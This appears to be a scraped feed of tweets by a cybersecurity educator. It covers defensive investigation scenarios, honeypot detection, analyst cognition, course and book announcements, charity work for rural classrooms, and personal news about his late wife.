Hi, Y'all!
I tweet about the intersection of cyber security investigation doctrine, cognitive psychology, and education. Also BBQ.
👨🏻🏫 Online Courses I Teach:
📚 Books I've Written:
🌎 Blog & More Links:
Look at this slice of awesome. The new Wireshark version in dev (3.3.0) has a packet diagram view.
A fantastic teaching and learning tool! When released, I'll be making pretty extensive use of this in my classes! Great job
@geraldcombs
and
@WiresharkNews
team.
Student: *asks question about thing*
Me: *looks up thing in book I wrote*
Student: "Wait, you have to look up something from your own book?"
Me: "Well yea, why do you think I took the time to write it all down?"
Student: *twitches*
I don't know who needs to hear this today but cyber security work is really hard. Even at the entry level, it's difficult work.
People around you too easily forget that because of the curse of knowledge -- we can't remember what it was like to not know something we know.
I know a lot of teachers right now are getting their classrooms ready for the new year. You're loved and appreciated.
If you've got a classroom wishlist...
Reply to this tweet with your wish list link
AND
Follow me or open your DMs so I can message you
#clearthelist
📚🎁😄
Big news!
After a long wait, I'm excited to publicly release my doctoral dissertation, "The Analyst Mindset: A Cognitive Skills Assessment of Digital Forensic Analysts".
You can download it here: .
I held Ellen's hand as she passed away peacefully last night after an 18 month battle with brain cancer. She was the best person I've ever known and was so incredibly loved.
I got a text message today from someone asking for help increasing their mailbox size.
She owns a small business in Kentucky and got my number from a business card taped to a server I installed FIFTEEN YEARS AGO.
It’s still there, running the entire business.
I know a lot of teachers right now are getting their classrooms ready for the new year. You're loved and appreciated.
If you've got a classroom wishlist...
Reply to this tweet with your wish list link
AND
Follow me or open your DMs so I can message you
#clearthelist
📚🎁😄
I’m excited to launch our latest online course, YARA for Security Analysts.
We built this course for people who want to learn to write YARA rules for detection engineering, system triage, incident response, and threat intel research.
#Yara
#DetectionEngineering
#DFIR
#Malware
I've got a few SIGNED copies of my Intrusion Detection Honeypots to give away. 🍯
To enter, retweet this tweet. I'll pick a few folks at random to win on Friday. You must have a US shipping address to win.
Learn about the book here:
I'm excited to share the cover for my next book:
🍯🍯🍯🍯🍯🍯🍯🍯🍯🍯🍯
Intrusion Detection Honeypots: Detection through Deception.
🍯🍯🍯🍯🍯🍯🍯🍯🍯🍯🍯
Available this summer where books are sold.
Investigation Scenario 🔎
HR suspects that a former employee may have taken sensitive data when they quit.
What do you look for to investigate this event?
Assume you have access to any evidence source you want, but no commercial DLP tools.
#InvestigationPath
#DFIR
#SOCAnalyst
One of the more helpful things new analysts can do is to read about different sorts of attacks and understand the timeline of events that occurred in them. This enables something called forecasting, which is an essential skill. Let's talk about that. 1/
Today I’m releasing the first in a series of blog posts dedicated to analysis techniques you can use to deal with large overwhelming PCAP files.
First up I’m colorizing packets by conversation in Wireshark.
I'm beyond excited to announce the newest
@NetworkDefense
online course: CyberChef for Security Analysts. 👨🍳👩🍳
You can learn more and sign up for it here: .
Today is my official graduation day. I needed to be elsewhere so I couldn’t attend as planned, but I did manage to take a picture in my doctoral regalia a couple of days ago for posterity.
I don't know who needs to hear this, but if you traveled regularly for work and haven't in a while because of the pandemic, go check your travel bag and make sure you didn't leave any snacks in there...
...
A lot of SOC jobs are seen as temporary stepping stones and places where burnout is a certainty. I think that's less about the job and more about many environments failing to adequately support the job.
I've got a few SIGNED copies of my Intrusion Detection Honeypots to give away. 🍯
To enter, retweet this tweet. I'll pick a few folks at random to win on Friday. You must have a US shipping address to win.
Learn about the book here:
Let’s play a game. Assume you’ve been hired as the CISO of a 1000 employee org that has literally no security infrastructure.
What types of product-based security solutions are REQUIRED purchases to build an effective sec program within 3 years?
When an attacker gains initial access to a system on a network, common actions are:
1. Scanning the network for pivot targets
2. Pillaging the system for valuable files
3. Stealing credentials from the system
Each provides an opportunity for honeypot-based detection 🧵
1/
A lot of teachers are starting back to school today or around now. We love you and we're thinking about you.
PS - If you're seeing this and you're one of those teachers, DM me your classroom Amazon wishlist if you have one 😉
We had the funeral service for Ellen this past weekend. It was a beautiful celebration of her life with hundreds of people who loved her in attendance. I'm trying to figure out what life looks like now, and honestly, I'm struggling, but I've got help and I'll be okay eventually.
The most common action an analyst will take is performing a search. Usually in a tool like Security Onion, Splunk, Kibana, and so on. The second most common action an analyst will take is pivoting. That term gets used a lot, but what exactly does it mean? 1/
Intrusion Detection Honeypots are the most valuable, yet underutilized detection technologies available, and these techniques often scale down as well as they scale up. 🍯
For threat hunting, a non-trivial amount of the work is referencing, creating, and updating system and network inventory. This doesn't get talked about enough as a skill set that someone develops. 1/
I've been getting a lot of new RTF gear lately. It's good timing because I'm down 60 pounds now and all my old stuff is too big. A good problem to have! It's been a long road but I'm feeling the best I have physically since college.
Here's the deal. Today's my birthday and all I want from you is the same thing I ask for every year -- reply to this tweet and share with me some *unconventional* wisdom you've learned over the course of your life. It can be about anything.
Hi New Followers!
I tweet about infosec, psychology, packets, education, and investigations.
Favorite blog posts:
Free Cuckoo’s Egg training:
Online training courses:
I’ve been working with
@da_667
to turn his Building Virtual Labs book into a “Choose Your Own Adventure" online course for
@NetworkDefense
. I think it turned out really well, and it’ll be open on Thursday.
You can read about it here:
Investigation Scenario 🔎
A user workstation made a DNS query for a domain that was reported to be associated with malvertising activity.
What do you look for to start investigating this event?
Assume you have access to any evidence source you want.
One of the bigger initial barriers for newer analysts to break through is understanding exactly where investigative work happens. Much of it happens in the web browser and search engine rather than the SIEM or command line. 1/
We put together a
@sigma_hq
cheat sheet while building our Detection Engineering with Sigma online course.
Even if you don't take the course, you can grab the cheat sheet for free here:
Course Details:
Shout out to all the SOC analysts on shift or IR folks working cases today, and their families. We appreciate ya.
If you're able, drop by and bring them something tasty or give 'em a shout to let them know you're thinking about them.
By the way, when I say great tools don't just help people do a job, they teach them how to do it...this is an example.
Sometimes it's nudging people toward decisions. Here, it's simplifying complexity using visual reference models.
Look at this slice of awesome. The new Wireshark version in dev (3.3.0) has a packet diagram view.
A fantastic teaching and learning tool! When released, I'll be making pretty extensive use of this in my classes! Great job
@geraldcombs
and
@WiresharkNews
team.
I’m excited to launch our latest course, Splunk for Security Analysts. ⛏️
You can read more about the online, on-demand Splunk for Security Analysts course and register now at .
I'm really excited to share that our newest online class, Detection Engineering with Sigma, is open this morning. You can learn more and register at .
The course is discounted for launch until next Friday.
Investigation Scenario 🔎
While hunting through O365 logs, you discovered the depicted entry related to one of your user’s mailboxes.
The user is on vacation for a week and unreachable. What do you look for to investigate whether an incident occurred?
#InvestigationPath
#DFIR
Well folks, we raised $11,000 for the
@RuralTechFund
at
@DerbyCon
. That’ll change a lot of lives.
Thank you to everyone who came by and bought a shirt or raffle ticket.
For you IR folks or many-hat-wearing IT folks who got a lot busier this week... make sure you're taking breaks, eating all your meals, and getting enough sleep. Your brain (and the rest of your body) will work a lot better.
Shout out to
@CISAKrebs
and others like him in government service who lose their jobs doing what’s right. I’ve been there too. You’re on the right side of history and we see you.
When I retire, I think I'm just gonna hook the smoker up to the truck and drive around to all my favorite SOCs and cook BBQ for everybody. Traveling infosec tailgate.
I just published the third article in my series dedicated to analyzing large PCAPs.
This one focuses on distilling PCAPs down to key events with Suricata, Bro, PRADS, and more.
I also mention the
@securityonion
so-import-pcap script.
Investigation Scenario 🔎
A JR analyst is concerned that Cobalt Strike is running on a Windows host. They proposed steps to investigate the event.
What feedback would you give them on their proposed investigation path? What would you prioritize, deprioritize, add, or change?
It's been a while since I've updated on Ellen's condition. Unfortunately, her cancer has progressed significantly in the past couple of months. We recently decided to forgo further treatment and pursue hospice care as she enters her final weeks.
A year ago today, my wife Ellen had a seizure. In March, I shared that she eventually received a diagnosis of Glioblastoma, a rare form of incurable brain cancer. She's been doing well, considering what she's dealing with. Here's an update...
“The Cuckoo’s Egg: Tracking a Spy Through the Maze of Computer Espionage” by Clifford Stoll is a nonfiction masterpiece. The story is a first-person account of searching for a hacker while Stoll was working at the Lawrence Berkeley National Laboratory. After noticing a 75-cent 1/
Host OS logs are forensically valuable and you should take time to learn and experiment with common sequences. Here’s a few steps to help you…
FIRST, setup a Windows system using these logging recs:
And this sysmon config: . 1/
From recent research...
Upon notification of potential malware infection, SOC analysts tend to spend more time trying to confirm the malware infection, whereas IR/DF analysts tend to assume infection and move toward understanding impact.
Investigation Scenario 🔎
TeamViewer_Desktop.exe executed on a system in your network.
What do you look for to start investigating this event?
Assume you have access to any evidence source you want.
One of the more unfortunate artifacts from how defensive security evolved is how fractured the SOC, IR, and DF communities are. They all rely on the same cognitive toolset, but often operate as separate professional communities much of the time. 1/
Investigation Scenario 🔎
A system mounted a file named TXRTN_8291834.iso.
What do you look for to determine if this system is infected and identify the potential malware?
The file is no longer available but you can use any other evidence source you like.
#InvestigationPath
We're celebrating good news today, as Ellen finished her six weeks of radiation and chemo every day. She got through with only very minimal side effects and feels pretty good!
In the 1980’s the CIA caught a contractor stealing information because a secretary notice the last login time for her terminal was not what it should be.
Last Login Time may be one of the best bang for your buck security controls you can implement, but so few people do.
All the things we say about people at funerals should be said at birthdays and anniversaries and brunches and Tuesdays and so many other times as well.
Very excited to share that we raised over $8000 for
@RuralTechFund
at
@Derbycon
. This shatters last years total. 100% of that will go to classrooms in rural areas, helping us introduce thousands of students to technical education. I’m grateful for everyone who contributed!
I'm pretty impressed with Brim. It's a really quick way to break down a PCAP into Zeek logs, do some quick analysis, and even pivot back into smaller PCAPs.
#SOC
Repo:
Download:
Demo:
Most analysts deal with decision fatigue -- a phenomenon that causes their decision making to get worse as they make a greater number of decisions. I bet you've experienced this too...🧵 1/
I spent a good chunk of the past week talking with teachers and helping them stock their classrooms for the upcoming school year. I want to talk a bit about some issues teachers are facing right now. 1/ 🧵
I'm really honored to have won the SANS Difference Makers Award for my work with the RTF.
This was quite a shock, and I appreciate SANS recognizing the cause of helping expose more rural kids to technology education.
Congratulations to the winners of the 2018 Difference Makers Award! The Difference Makers Awards were created to honor the unsung heroes in
#cybersecurity
whose innovation, skill, and hard work have resulted in real successes in information security.
An Investigation Theory student asked me a good question last week -- Do you need to understand how a specific malware strain works to investigate a system where you suspect it might be present? Let's talk about it. 1/
Investigation Scenario 🔎
A user reported their mouse moving around on the screen by itself for a few minutes. The cursor appeared to open and close a few documents on the desktop.
What do you look for to investigate whether an incident has occurred?
#InvestigationPath
#DFIR
Let's talk about the differences between novices and experts. But, instead of cyber security, we'll use airport baggage screeners as an example. These are the folks who use the scanner screens to find forbidden items in luggage 1/
Some of the work I'm most proud of from my time at Mandiant was pioneering the building of investigative actions *into detection signatures* as they were written. This had profound impact across the detection and product teams, and made the tool so much more accessible.
A good alert includes:
- Detection context
- Investigation/response context
- Orchestration actions
- Prevalence info
- Environmental context (e.g, src IP is scanner)
- Pivots/visual to understand what else happened
- Able to answer, "Is host already under investigation?"
Since I spend so much time talking to and researching SOCs and SOC analysts, I often get asked, "What the biggest difference is between high and low growth SOCs?"
The answer? Expectations.
1/
I'm doing research for my next book and I'd love to talk to you if:
- You've used honeypots/tokens to successfully catch bad guys
- You've been caught by honeypots/tokens as a pen tester
- You've used a non-typical type of deception tech to do cool things
RTs appreciated
Shout out to all the SOC analysts just trying to get through their alert queues this month while being bombarded with questions about CVEs, breaches, and the constant distractions that come with it all.
I'm keynoting the SANS Threat Intel Summit two weeks from today.
This'll be my first public, in-person talk since 2020 and I'll be discussing my research on how analysts think and work through investigations.
You can attend in person or virtually:
Getting people interested in infosec isn’t hard. Keeping them is. How we lose people (unordered):
1) Reliance on tacit knowledge
2) A knowledge-based social economy
3) Exclusivity
4) Unclear traditional academic paths to success
5) Lack of leadership accountability
One of the most common questions analysts ask me -- what do I do when I get stuck in an investigation? This happens to everyone, especially when you're inexperienced. Let's talk about that... 1/
There's often interesting public discussion about vendor detection tools and what they detect vs expectations. There's some interesting decision making that happens behind the scenes at these vendors when it comes to how they manage detection signatures. A thread... 1/
Investigation Scenario 🔎
You’ve discovered regsvr32.exe running from the C:\Users\Username\Appdata\Roaming directory on a Windows system.
What do you look for to investigate whether an incident occurred?
#InvestigationPath
#DFIR
#SOC